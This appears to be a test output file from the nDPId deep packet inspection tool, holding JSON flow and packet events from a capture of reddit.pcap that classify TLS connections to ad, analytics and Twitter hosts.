-00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1929,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687016,"pkt":"qtsDr8lk5EKm5WPyht1gAMi0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxxABu7duD9DT5uqvgBAB+wcHAAABAQgKVF\/gK8LXPFk="} -00969{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1930,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687016,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687016,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1931,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs7YqAcsBIEmLB5kd7IUo3\/YpAbuVsAnf\/VJtBZoyoBJXgFGuAAACBAV4AQMDAwQCCArC1zxhc6MlRg=="} -00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1932,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687024,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAA35IcYqAcsBIEmLB5kd7IUo3\/YpAbup5BqPq4R5AeISoBJXgAGtAAACBAV4AQMDAwQCCArC1zxhS\/piSQ=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1933,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gCh2fACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7O2lbABu20FmjIJ3\/1TgBAB+9WjAAABAQgKc6MlYsLXPGE="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1934,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687024,"pkt":"qtsDr8lk5EKm5WPyht1gDjDtACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAN+SHGqeQBu3kB4hIaj6uFgBAB+4WXAAABAQgKS\/picMLXPGE="} -00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1935,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686996,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1936,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291686985,"flow_last_seen":1605291687024,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1938,"source":"reddit.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":50960,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagservices.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1949,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686985,"flow_last_seen":1605291687075,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687075,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.amazon-adsystem.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1962,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291686996,"flow_last_seen":1605291687096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687096,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"c.aaxads.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687485,"flow_last_seen":1605291687485,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687485,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2333,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1605291687485,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687485,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ4AAAAAoAL9IP2VAAACBAWgBAIICruOxrcAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2341,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1605291687512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687512,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAKzZEsIqAcsBIEmLB5kd7IUo3\/YpAbvHUvrRnoyfz12foBJXgAjWAAACBAV4AQMDAwQCCArC1z5Fu47Gtw=="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2342,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1605291687513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687513,"pkt":"qtsDr8lk5EKm5WPyht1gDGJhACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACs2RLCx1IBu5\/PXZ\/60Z6NgBAB+4zMAAABAQgKu47G0sLXPkU="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687514,"flow_last_seen":1605291687514,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687514,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605291687514,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687514,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5MAAAAAoAL9IOSoAAACBAWgBAIICiRA7pIAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687545,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleJ0qAcsBIEmLB5kd7IUo3\/YpAbu8cGxxKx0ItjeUoBJXgPGUAAACBAV4AQMDAwQCCArC1z5pJEDukg=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687545,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5RscSsegBAB+3WHAAABAQgKJEDuscLXPmk="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687642,"flow_last_seen":1605291687642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687642,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605291687642,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687642,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxgAAAAAoAL9IGTNAAACBAWgBAIICsL4XLwAAAAAAQMDBw=="} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605291687676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687676,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAgqAcsBIEmLB5kd7IUo3\/YpAbuaYOcfuuGDx7sZoBJXgGbFAAACBAV4AQMDAwQCCArC1z7qwvhcvA=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1605291687676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687676,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxnnH7rigBAB++qzAAABAQgKwvhc38LXPuo="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687761,"flow_last_seen":1605291687761,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605291687761,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687761,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bcAAAAAoAL9IFSZAAACBAWgBAIIClvEqOkAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2609,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687790,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs9EqAcsBIEmLB5kd7IUo3\/YpAbuAylJzVUg0Stm4oBJXgFBhAAACBAV4AQMDAwQCCArC1z9gW8So6Q=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2610,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687790,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bhSc1VJgBAB+9RVAAABAQgKW8SpBsLXP2A="} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 